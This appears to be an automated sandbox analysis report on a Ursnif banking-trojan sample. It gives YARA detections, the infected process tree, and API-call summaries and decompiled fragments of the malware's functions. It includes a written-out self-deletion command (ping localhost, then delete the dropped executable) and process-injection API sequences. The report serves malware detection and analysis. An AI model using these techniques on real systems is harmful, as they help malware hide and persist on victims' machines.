Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.853379113.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.922958864.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 2244 Parent PID: 788

General

Start time:	10:31:01
Start date:	27/05/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff698ba0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1272 Parent PID: 2244

General

Start time:	10:31:02
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2244 CREDAT:17410 /prefetch:2
Imagebase:	0x1a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1760 Parent PID: 788

General

Start time:	10:31:46
Start date:	27/05/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff698ba0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6052 Parent PID: 1760

General

Start time:	10:31:48
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1760 CREDAT:17410 /prefetch:2
Imagebase:	0x1a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5692 Parent PID: 788

General

Start time:	10:32:12
Start date:	27/05/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff698ba0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5568 Parent PID: 5692

General

Start time:	10:32:13
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5692 CREDAT:17410 /prefetch:2
Imagebase:	0x1a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1192 Parent PID: 788

General

Start time:	10:32:17
Start date:	27/05/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff698ba0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1084 Parent PID: 1192

General

Start time:	10:32:17
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1192 CREDAT:17410 /prefetch:2
Imagebase:	0x1a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1736 Parent PID: 788

General

Start time:	10:32:22
Start date:	27/05/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff698ba0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 608 Parent PID: 1736

General

Start time:	10:32:23
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1736 CREDAT:17410 /prefetch:2
Imagebase:	0x1a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 4404 Parent PID: 5940

General

Start time:	10:32:27
Start date:	27/05/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe /?
Imagebase:	0x7ff7dd910000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3760 Parent PID: 4404

General

Start time:	10:32:34
Start date:	27/05/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff742840000
File size:	3932672 bytes
MD5 hash:	E4A81EDDFF8B844D85C8B45354E4144E
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3840 Parent PID: 3760

General

Start time:	10:32:51
Start date:	27/05/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'
Imagebase:	0x7ff6bd880000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5264 Parent PID: 3840

General

Start time:	10:32:51
Start date:	27/05/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7606d0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 5412 Parent PID: 3840

General

Start time:	10:32:51
Start date:	27/05/2020
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff7cf540000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 3208 Parent PID: 3760

General

Start time:	10:32:52
Start date:	27/05/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6d46c0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 5864 Parent PID: 4404

General

Start time:	10:32:52
Start date:	27/05/2020
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Imagebase:	0x7ff7f7720000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4328 Parent PID: 3760

General

Start time:	10:32:56
Start date:	27/05/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6d46c0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4964 Parent PID: 3760

General

Start time:	10:32:59
Start date:	27/05/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6d46c0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CVPFktt.exe PID: 5940 Parent PID: 6060 CVPFktt.exeUNIQUE

Executed Functions

Function 001C15C3, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 311
memorylibrarynativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.NTDLL(001E6368), ref: 001C15E2

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

memset.NTDLL ref: 001C1613
RtlInitializeCriticalSection.NTDLL(03E58D20), ref: 001C1624

Part of subcall function 001C62EF: RtlInitializeCriticalSection.NTDLL(001E6340), ref: 001C6313
Part of subcall function 001C62EF: RtlInitializeCriticalSection.NTDLL(001E6320), ref: 001C6329
Part of subcall function 001C62EF: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C633A
Part of subcall function 001C62EF: GetModuleHandleA.KERNEL32(001E701D,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C6367

Part of subcall function 001D0916: RtlAllocateHeap.NTDLL(00000000,-00000003,77D89F00), ref: 001D0930

CreateMutexA.KERNELBASE(00000000,00000001,00000060,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1648
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1659
CloseHandle.KERNEL32(0000030C,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C166D
GetUserNameA.ADVAPI32(00000000,?), ref: 001C16B2
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C16C5
GetUserNameA.ADVAPI32(00000000,?), ref: 001C16DA
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001C1713
OpenProcess.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1728
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1732
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C173C
GetShellWindow.USER32 ref: 001C1757
GetWindowThreadProcessId.USER32(00000000), ref: 001C175E
CreateEventA.KERNEL32(001E6114,00000001,00000000,00000000,61636F4C,00000001,?,?,?,00000000,?,?,?,?,?,001CEF2B), ref: 001C17E3
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 001C180B
OpenEventA.KERNEL32(00100000,00000000,03E589B8,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1836
CreateEventA.KERNEL32(001E6114,00000001,00000000,?,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001C184C
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C1852
LoadLibraryA.KERNEL32(ADVAPI32.DLL,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C18E9
SetEvent.KERNEL32(?,001D7D1E,00000000,00000000,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001C1962
RtlAllocateHeap.NTDLL(00000000,00000043,001D7D1E), ref: 001C197A
wsprintfA.USER32 ref: 001C19AA

Part of subcall function 001D51F2: HeapFree.KERNEL32(00000000,?,00000000,Scr,?,00000000,?,?,00000000,001C193F,001D7D1E,00000000,00000000), ref: 001D5268

Part of subcall function 001C67D6: HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 001C6844

Strings

ADVAPI32.DLL, xrefs: 001C18E4
0123456789ABCDEF, xrefs: 001C162B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 2689593651-803475220
Opcode ID: b5177dc4e9a3f53155a5852ea19fd21ea1e181364f64cc05d10183b2dc895132
Instruction ID: 473dcb76f56c21780c9c2531880e4935958d4013af37ca80c8a59f421082a121
Opcode Fuzzy Hash: b5177dc4e9a3f53155a5852ea19fd21ea1e181364f64cc05d10183b2dc895132
Instruction Fuzzy Hash: 68B1F271540388AFC720EFA5DC85E2E7BAAFB66744B51081DF1428BAA2CB71D880CB51

Uniqueness

Uniqueness Score: 100.00%

Function 001DB746, Relevance: 16.6, APIs: 11, Instructions: 128
librarynativeloaderUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,DE9FBDEB,00000000,001C7EAB,?,00000000,?), ref: 001DB771
GetLastError.KERNEL32 ref: 001DB77F
NtSetInformationProcess.NTDLL ref: 001DB7D2
GetProcAddress.KERNEL32(61657243), ref: 001DB83B
TerminateThread.KERNEL32(?,00000000,?,00000004,?), ref: 001DB889
CloseHandle.KERNEL32(?), ref: 001DB89F
FindCloseChangeNotification.KERNELBASE(?), ref: 001DB8C0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseProcess$AddressChangeErrorFindHandleInformationLastNotificationOpenProcTerminateThread
String ID:
API String ID: 699584128-0
Opcode ID: 203d6fcb97ff03ae1fec89f39898d51009113b789ec8cffd0cf6dda56666dbbb
Instruction ID: 22ffb293cba16a3d1a3697661d675450b835f35b42f6b271520e995ce013b88b
Opcode Fuzzy Hash: 203d6fcb97ff03ae1fec89f39898d51009113b789ec8cffd0cf6dda56666dbbb
Instruction Fuzzy Hash: AC41BF31108345EFDB119FA0DCC4A6FBBECFB58354F01482AF656962A1D770C988DB92

Uniqueness

Uniqueness Score: 100.00%

Function 001D975C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81
nativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,?,?,?), ref: 001D97A3
NtOpenProcessToken.NTDLL(?,00000008,S:(M), ref: 001D97B6
NtQueryInformationToken.NTDLL(S:(M,00000001,00000000,00000000,?), ref: 001D97D2

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 001D97EF
memcpy.NTDLL(?,00000000,0000001C), ref: 001D97FC
NtClose.NTDLL(?), ref: 001D980E
NtClose.NTDLL(?), ref: 001D9818

Strings

S:(M, xrefs: 001D97AD, 001D97CF, 001D97B0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID: S:(M
API String ID: 2575439697-2217774225
Opcode ID: cf2d5b065f899aee2f935c49573deb0b6b3620adcfe0919ae65321525eee5769
Instruction ID: 97d284fc28b7ad6d3d0c7ed736e0f1893ad8dbc1d9f0108db0a37ee92a6a1cf3
Opcode Fuzzy Hash: cf2d5b065f899aee2f935c49573deb0b6b3620adcfe0919ae65321525eee5769
Instruction Fuzzy Hash: F0210AB190011DBBDF019F95DC859DEBFBDEB18750F108026F505E6160D7718A459BA1

Uniqueness

Uniqueness Score: 100.00%

Function 004010D8, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004010D8(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402108();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404104; // 0x0
				_t5 = _t15 + 0x40505e; // 0x40505e
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402102(); // executed
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, "true", 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x004010d8
0x004010e1
0x004010e5
0x004010eb
0x004010f0
0x004010f5
0x004010f8
0x004010fb
0x00401100
0x00401101
0x00401104
0x00401109
0x00401116
0x0040111a
0x0040111c
0x0040111d
0x00401120
0x00401125
0x0040112f
0x00401131
0x00401131
0x00401145
0x0040114b
0x0040114f
0x0040119f
0x00401151
0x0040115a
0x00401170
0x00401178
0x0040118a
0x0040118e
0x00000000
0x00000000
0x0040117a
0x0040117d
0x00401182
0x00401184
0x00401184
0x00401165
0x00401167
0x00401190
0x00401191
0x00401191
0x0040115a
0x004011a7

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?,?,?,?,?,?,?,?,?,00401FFF,0000000A,?,?), ref: 004010E5
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004010FB
_snwprintf.NTDLL ref: 00401120
CreateFileMappingW.KERNELBASE(000000FF,00404108,00000004,00000000,?,?), ref: 00401145
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FFF,0000000A,?), ref: 0040115C
MapViewOfFile.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 00401170
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FFF,0000000A,?), ref: 00401188
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401FFF,0000000A), ref: 00401191
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FFF,0000000A,?), ref: 00401199

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 9f44c01fb009beda2faab43d4d8bc58944052e986a9268230908dadacd4e8787
Instruction ID: ed3a38c1b9a9e921508991befbf7d14af8bb7051a6707c1cc1c2f555009d4024
Opcode Fuzzy Hash: 9f44c01fb009beda2faab43d4d8bc58944052e986a9268230908dadacd4e8787
Instruction Fuzzy Hash: D521C4B2600104BFD714AFA4DC84EAE7BACEB48351F104036F705FB1E0D6785D458B69

Uniqueness

Uniqueness Score: 100.00%

Function 001CEE1C, Relevance: 10.6, APIs: 7, Instructions: 110
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.SHLWAPI(03E585A8,00000000,0000005C,?,?,4D283A53), ref: 001CEE58
_strupr.NTDLL ref: 001CEE6E
lstrlen.KERNEL32(03E585A8,?,4D283A53), ref: 001CEE76
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,4D283A53), ref: 001CEEF1
RtlAddVectoredExceptionHandler.NTDLL(00000000,001CFCEE), ref: 001CEF18
GetLastError.KERNEL32(?,?,?,4D283A53), ref: 001CEF32
RtlRemoveVectoredExceptionHandler.NTDLL(00AD9BE0), ref: 001CEF48

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: 829a3551ca56b9ce084746b8c3dde2eef245b15519ddfec2609e58f48ef0a81e
Instruction ID: 5d5b7348f125ad46eb45ee99940daa253f03f141bce10b7740e793031509e048
Opcode Fuzzy Hash: 829a3551ca56b9ce084746b8c3dde2eef245b15519ddfec2609e58f48ef0a81e
Instruction Fuzzy Hash: A231F2329002A49FDB20AFF89CC4E6EB7E9A7247A0B55052DF612DB591D730DDC48B51

Uniqueness

Uniqueness Score: 1.55%

Function 001D3E77, Relevance: 9.2, APIs: 6, Instructions: 234
nativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,001DBBC9,00000800,?,?,?,00000000), ref: 001D40B9

Part of subcall function 001C2C9D: GetModuleHandleA.KERNEL32(4C44544E,?,?,00000000,?,?,?,?,001D3F87,?,?,?,?,00000000), ref: 001C2CC2
Part of subcall function 001C2C9D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 001C2CE4
Part of subcall function 001C2C9D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 001C2CFA
Part of subcall function 001C2C9D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001C2D10
Part of subcall function 001C2C9D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001C2D26
Part of subcall function 001C2C9D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001C2D3C

Part of subcall function 001D154B: NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 001D1579

Part of subcall function 001D045E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001D04C4
Part of subcall function 001D045E: memcpy.NTDLL(?,?,?), ref: 001D0523

memcpy.NTDLL(001C1FC4,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 001D3FE6
memcpy.NTDLL(00000000,?,00000018,?,00000000,?,?,?,?,?,?,?,00000000), ref: 001D4032
NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 001D40F7
NtClose.NTDLL(00000000,?,00000000), ref: 001D411E
memset.NTDLL ref: 001D4139

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProcmemcpy$SectionView$CloseHandleModuleUnmapmemset
String ID:
API String ID: 4028138328-0
Opcode ID: 4d4ab165fedc9aaf9759dd27e5ca346c9481a2bfdc68fa42e23471fe41d7a8ac
Instruction ID: d813523b089e505b7dde34a40ba97ab04e60d2919e643b01d191df843b6f59f0
Opcode Fuzzy Hash: 4d4ab165fedc9aaf9759dd27e5ca346c9481a2bfdc68fa42e23471fe41d7a8ac
Instruction Fuzzy Hash: 14915B71A00209EFCF11DF98C981BEEBBB4FF18304F14856AE911A7351D771AA94DB91

Uniqueness

Uniqueness Score: 100.00%

Function 001DAF91, Relevance: 9.1, APIs: 6, Instructions: 52threadmemorynativeUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C73BD: RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001C73E7
Part of subcall function 001C73BD: RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001C7405
